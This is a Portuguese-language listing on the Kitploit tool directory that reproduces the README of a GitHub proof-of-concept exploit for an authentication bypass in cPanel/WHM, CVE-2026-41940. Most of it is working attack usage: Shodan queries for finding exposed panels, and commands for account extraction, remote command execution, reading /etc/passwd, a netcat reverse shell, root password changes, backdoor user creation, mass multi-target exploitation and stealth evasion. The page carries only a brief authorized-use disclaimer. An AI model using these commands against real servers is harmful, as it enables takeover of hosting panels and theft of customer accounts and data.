Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-41940-PoC-Exploit — 🚀 CVE-2026-41940 Exploit de Bypass de Autenticação cPanel/WHM - Melhor Fluxo 💥 Injeção CRLF leva a bypass de autenticação, sequestro de sessão e vazamento de contas. ✅ Proxy, UA personalizado, keep-alive, tentativas, verificação SSL, saída colorida, suporte a salvamento em arquivo. ⚡ PoC avançada para pentesters. | Kitploit
Ferramentas/GitHubGitHub/tc4dy/cve-2026-41940-poc-exploit
Autenticação e AutorizaçãoEscalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesPós-ExploraçãoTestes de PenetraçãoComando e Controle

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

🚀 CVE-2026-41940 Exploit de Bypass de Autenticação cPanel/WHM - Melhor Fluxo 💥 Injeção CRLF leva a bypass de autenticação, sequestro de sessão e vazamento de contas. ✅ Proxy, UA personalizado, keep-alive, tentativas, verificação SSL, saída colorida, suporte a salvamento em arquivo. ⚡ PoC avançada para pentesters.

Red Teaming
Desenvolvimento de Payloads
GitHubtc4dy/cve-2026-41940-poc-exploit

CVE-2026-41940-PoC-Exploit

Ver Repositório
92há 1 mêsAinda não revisado
Compartilhar

CVE-2026-41940

🚀 CVE-2026-41940 - Exploit de Bypass de Autenticação do cPanel/WHM

Python License CVSS Pentesting

Edição cPanel & WHM - Injeção CRLF para Bypass de Autenticação e Sequestro Total de Sessão

📌 Visão Geral

Este exploit aproveita a CVE-2026-41940, uma vulnerabilidade crítica de bypass de autenticação no cPanel/WHM. Ao injetar um payload CRLF manipulado no sistema de gerenciamento de sessão, ele consegue sequestro de sessão, acesso root e controle total sobre o painel de hospedagem sem qualquer credencial válida.

🔥 Principais Funcionalidades

🎯 Versões Vulneráveis

📍 Pesquisa Shodan

root@kitploit:~
port:2087 "cPanel" "WHM"
port:2083 "cPanel"

⚠️ Aviso: Esta ferramenta é destinada apenas para testes de segurança autorizados e fins educacionais. Acesso não autorizado é ilegal.

📦 Instalação

root@kitploit:~
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-41940-POC-Exploit
cd CVE-2026-41940-POC-Exploit

# Install dependencies
pip3 install -r requirements.txt

# Run
python3 exploit.py -t https://example.com:2087

🛠️ Exemplos de Uso

root@kitploit:~
# Basic exploitation (extract accounts)
python3 exploit.py -t https://192.168.1.100:2087

# Save accounts to file
python3 exploit.py -t https://192.168.1.100:2087 -o accounts.txt

# Verbose mode (debug output)
python3 exploit.py -t https://192.168.1.100:2087 -v

# Interactive WHM Shell (Recommended)
python3 exploit.py -t https://192.168.1.100:2087 -i

💻 Comandos do Shell Interativo

root@kitploit:~
[email protected] $ accounts          # List all cPanel accounts
[email protected] $ version           # Show cPanel version
[email protected] $ ls /home          # List directory
[email protected] $ cat /etc/passwd   # Read file
[email protected] $ exec id           # Execute command
[email protected] $ passwd NewPass123 # Change root password
[email protected] $ adduser test test.com pass123  # Create new user
[email protected] $ exit              # Exit shell

## 🔧 Execução Remota de Comandos

```bash
# Execute single command
python3 exploit.py -t https://192.168.1.100:2087 --cmd "id"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "cat /etc/passwd"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "whoami; hostname; uname -a"


# Read file
python3 exploit.py -t https://192.168.1.100:2087 --read /etc/passwd
python3 exploit.py -t https://192.168.1.100:2087 --read /home/example/config.php

🌐 Reverse Shell

root@kitploit:~
# Attacker machine (listener)
nc -lvnp 4444

# Exploit (reverse shell)
python3 exploit.py -t https://192.168.1.100:2087 --reverse-shell 10.0.0.1:4444

🔐 Operações de Pós-Exploração

root@kitploit:~
# Change root password
python3 exploit.py -t https://192.168.1.100:2087 --passwd "NewRootPass123!"

# Create new cPanel user
python3 exploit.py -t https://192.168.1.100:2087 --adduser hacker hacker.com Pass1234

# Keep-alive session (maintain access)
python3 exploit.py -t https://192.168.1.100:2087 --no-keep-alive  # Disable auto keep-alive

📊 Exploração em Massa (Multi-Alvo)

root@kitploit:~
# Create targets file
echo "https://target1.com:2087" > targets.txt
echo "https://target2.com:2087" >> targets.txt
echo "https://10.0.0.5:2087" >> targets.txt

# Mass exploit with 20 threads
python3 exploit.py -l targets.txt --threads 20

# Mass exploit with command execution
python3 exploit.py -l targets.txt --threads 10 --cmd "id"

⚙️ Opções Avançadas

root@kitploit:~
# Custom port (non-standard)
python3 exploit.py -t https://example.com -p 8443

# Using proxy
python3 exploit.py -t https://192.168.1.100:2087 --proxy http://127.0.0.1:8080

# Custom user-agent for stealth
python3 exploit.py -t https://192.168.1.100:2087 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Custom delay and retries
python3 exploit.py -t https://192.168.1.100:2087 --delay 5 --max-retries 5

# SSL verification (ignore self-signed by default)
python3 exploit.py -t https://192.168.1.100:2087 --ssl-verify

📊 Argumentos de Linha de Comando

🧪 Ambiente de Teste

Docker (if you want to test safely)

docker run -d --name cpanel-test -p 2087:2087 cpanel/cpanel:102

Or with vulnerable version

docker pull cpanel/cpanel:11.102 docker run -d -p 2087:2087 cpanel/cpanel:11.102

🔗 Exploits Relacionados

Confira meus outros repositórios de exploit:

  • CVE-2026-24061
  • CVE-2026-0073
  • CVE-2026-29000
Baixar ferramenta
CategoriaFuncionalidades
Exploração✅ Bypass de Autenticação via Injeção CRLF
✅ Sequestro de Sessão WHM
✅ Vazamento de Token de Segurança
✅ Acesso Root Imediato
Pós-Exploração✅ Extração de Lista de Contas (Usuário + Domínio)
✅ Execução Remota de Comandos (RCE)
✅ Reverse Shell (compatível com netcat)
✅ Leitura de Arquivos (configs, logs, etc)
✅ Alteração de Senha Root
✅ Criação de Novo Usuário cPanel
Varredura✅ Exploração de Alvo Único
✅ Varredura em Massa Multi-Alvo
✅ Multi-Threading (threads configuráveis)
✅ Suporte a Substituição de Porta
Furtividade✅ Atrasos Aleatórios entre Requisições
✅ Spoofing de X-Forwarded-For
✅ Suporte a User-Agent Personalizado
✅ Suporte a Proxy (HTTP/HTTPS)
Usabilidade✅ Shell WHM Interativo (-i)
✅ Saída Colorida (colorama)
✅ Modo Verboso/Debug
✅ Exportação de Lista de Contas para Arquivo
✅ Thread de Sessão Keep-Alive
✅ Mecanismo de Retry para Conexões Instáveis
ProdutoVersõesStatus
cPanel & WHM11.92 - 11.102✅ Confirmado
cPanel & WHM11.104 - 11.110✅ Confirmado
cPanel & WHM11.118 - 11.136⚠️ Limitado
cPanel & WHM< 11.86✅ Possivelmente vulnerável
CurtoLongoDescriçãoPadrão
-t--targetURL de alvo únicoObrigatório (único)
-l--target-fileArquivo contendo lista de alvosObrigatório (massa)
-p--portSubstituir portaAuto-detecção
-o--outputSalvar lista de contas em arquivoNenhum
-v--verboseAtivar saída de debugFalso
-i--interactiveShell WHM interativoFalso
--proxyProxy HTTP/HTTPSNenhum
-ua--user-agentUser-Agent personalizadoAleatório
--cmdExecutar comando únicoNenhum
--reverse-shellReverse shell IP:PORTNenhum
--passwdAlterar senha rootNenhum
--adduserCriar novo usuário (USUÁRIO DOMÍNIO SENHA)Nenhum
--readLer arquivo do alvoNenhum
--threadsThreads para varredura em massa10
--delayIntervalo de keep-alive (segundos)3.0
--max-retriesMáximo de tentativas por requisição3
--no-keep-aliveNão manter sessãoFalso
--ssl-verifyVerificar certificados SSLFalso